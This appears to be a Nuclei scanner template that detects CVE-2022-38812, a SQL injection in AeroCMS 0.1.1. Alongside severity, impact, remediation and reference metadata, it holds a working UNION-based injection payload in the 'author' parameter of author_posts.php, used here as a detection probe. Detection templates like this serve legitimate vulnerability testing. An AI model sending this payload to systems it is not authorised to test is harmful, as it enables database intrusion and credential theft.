id: CVE-2022-38812

info:
  name: AeroCMS 0.1.1 - SQL Injection
  author: shivampand3y
  severity: medium
  description: |
    AeroCMS 0.1.1 contains a SQL injection caused by unsanitized author parameter, letting attackers execute arbitrary SQL commands, exploit requires crafted author input.
  impact: |
    Authenticated attackers can exploit SQL injection in the author parameter to extract sensitive database information including user credentials, content data, and application configuration from the AeroCMS database.
  remediation: |
    Update AeroCMS to a version newer than 0.1.1 that properly sanitizes the author parameter and uses parameterized queries.
  reference:
    - https://www.exploit-db.com/exploits/51022
    - https://www.nu11secur1ty.com/2022/08/aerocms-v001-sqli.html
    - https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/MegaTKC/2021/AeroCMS-v0.0.1-SQLi
    - https://nvd.nist.gov/vuln/detail/CVE-2022-38812
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2022-38812
    cwe-id: CWE-89
    epss-score: 0.02103
    epss-percentile: 0.79263
  metadata:
    verified: true
    max-request: 2
    vendor: aerocms_project
    product: aerocms
  tags: cve,cve2022,aero,cms,sqli,edb,vuln

variables:
  num: "999999999"

http:
  - method: GET
    path:
      - '{{BaseURL}}/author_posts.php?author=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5({{num}}),1,1),NULL,NULL,NULL,NULL--%20-&p_id=1'
      - '{{BaseURL}}/cms/author_posts.php?author=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5({{num}}),1,1),NULL,NULL,NULL,NULL--%20-&p_id=1'

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5(num)}}'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e4b87375abbfde4eae100a010cc96762d34c299681e7880c552005c59f181ca802201ce68aaeadb534689a73f49d8b66d6423318644a92937a1956f68d5449d119cc:922c64590222798bb761d5b6d8e72950